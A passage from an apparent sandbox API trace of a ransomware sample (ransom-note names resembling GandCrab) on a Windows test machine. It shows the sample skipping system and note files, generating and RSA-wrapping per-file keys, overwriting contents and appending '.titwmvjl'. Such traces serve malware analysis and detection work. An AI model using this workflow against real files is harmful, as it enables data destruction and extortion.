lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x229c, lpOverlapped=0x0) returned 1 [0088.898] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffdd64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.898] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x229c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x229c, lpOverlapped=0x0) returned 1 [0088.899] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.899] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0088.900] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.903] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.904] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.904] CloseHandle (hObject=0x2b4) returned 1 [0088.905] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\g9sq-f5kgugzidvv.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\G9sQ-F5KGugZIDvv.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\g9sq-f5kgugzidvv.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0088.906] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.906] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.906] lstrcmpW (lpString1="jZOzv1.avi", lpString2=".") returned 1 [0088.906] lstrcmpW (lpString1="jZOzv1.avi", lpString2="..") returned 1 [0088.906] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="jZOzv1.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi" [0088.906] lstrlenW (lpString=".titwmvjl") returned 9 [0088.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned 57 [0088.906] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.906] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi.titwmvjl") returned 66 [0088.906] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned 57 [0088.906] lstrlenW (lpString=".avi") returned 4 [0088.906] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.907] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0088.907] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0088.907] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned 57 [0088.907] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned 57 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="desktop.ini") returned 1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="autorun.inf") returned 1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="ntuser.dat") returned -1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="iconcache.db") returned 1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="bootsect.bak") returned 1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="boot.ini") returned 1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="ntuser.dat.log") returned -1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="thumbs.db") returned -1 [0088.907] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="ntldr") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="NTDETECT.COM") returned -1 [0088.908] lstrcmpiW (lpString1="jZOzv1.avi", lpString2="Bootfont.bin") returned 1 [0088.908] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi") returned 57 [0088.908] lstrlenW (lpString=".avi") returned 4 [0088.908] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.908] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0088.908] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.908] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.909] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\jzozv1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0088.909] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.909] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0088.910] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.910] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.910] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.912] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.912] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.912] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.912] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0088.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.913] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.913] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.913] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.913] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.915] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.915] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.915] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.915] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0088.915] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.915] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.915] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.916] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.916] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.917] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.917] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5037b8) returned 1 [0088.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.918] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.918] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.918] GetLastError () returned 0x0 [0088.918] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.918] CryptDestroyKey (hKey=0x5037b8) returned 1 [0088.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.919] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.919] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.919] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.920] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0088.920] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.920] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.921] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.921] GetLastError () returned 0x0 [0088.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.921] CryptDestroyKey (hKey=0x503278) returned 1 [0088.921] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.921] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.921] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.921] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.922] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x8106, lpOverlapped=0x0) returned 1 [0088.928] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffff7efa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8106, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x8106, lpOverlapped=0x0) returned 1 [0088.929] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0088.930] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.934] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.934] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.934] CloseHandle (hObject=0x2b4) returned 1 [0088.935] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\jzozv1.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\jZOzv1.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\jzozv1.avi.titwmvjl"), dwFlags=0x1) returned 1 [0088.936] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.936] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.936] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0088.936] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0088.936] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt" [0088.936] lstrlenW (lpString=".titwmvjl") returned 9 [0088.936] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt") returned 67 [0088.936] VirtualAlloc (lpAddress=0x0, dwSize=0xc6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.936] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 76 [0088.936] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt") returned 67 [0088.936] lstrlenW (lpString=".txt") returned 4 [0088.936] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.936] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0088.937] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0088.937] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt") returned 67 [0088.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\TITWMVJL-DECRYPT.txt") returned 67 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0088.937] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0088.937] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.937] FindNextFileW (in: hFindFile=0x503438, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0088.937] lstrcmpW (lpString1="x5 95.wav", lpString2=".") returned 1 [0088.937] lstrcmpW (lpString1="x5 95.wav", lpString2="..") returned 1 [0088.937] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\", lpString2="x5 95.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav" [0088.937] lstrlenW (lpString=".titwmvjl") returned 9 [0088.937] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned 56 [0088.937] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.938] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav.titwmvjl") returned 65 [0088.938] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned 56 [0088.938] lstrlenW (lpString=".wav") returned 4 [0088.938] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.938] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0088.938] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0088.938] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned 56 [0088.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned 56 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="desktop.ini") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="autorun.inf") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="ntuser.dat") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="iconcache.db") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="bootsect.bak") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="boot.ini") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="ntuser.dat.log") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="thumbs.db") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="ntldr") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="NTDETECT.COM") returned 1 [0088.939] lstrcmpiW (lpString1="x5 95.wav", lpString2="Bootfont.bin") returned 1 [0088.939] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav") returned 56 [0088.939] lstrlenW (lpString=".wav") returned 4 [0088.939] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.939] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0088.939] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.939] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.940] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\x5 95.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\x5 95.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0088.940] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.940] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0088.941] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.941] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.941] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.942] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.942] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.942] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.942] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0088.942] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.942] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.942] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.943] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.943] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0088.944] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.944] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.944] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.944] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0088.944] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.944] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.944] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.945] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.945] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.946] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5038f8) returned 1 [0088.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.946] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.946] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.946] GetLastError () returned 0x0 [0088.946] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.947] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.947] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.947] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.947] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0088.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.948] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503378) returned 1 [0088.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.948] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0088.948] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.948] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0088.949] GetLastError () returned 0x0 [0088.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.949] CryptDestroyKey (hKey=0x503378) returned 1 [0088.949] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.949] CryptReleaseContext (hProv=0x4c9980, 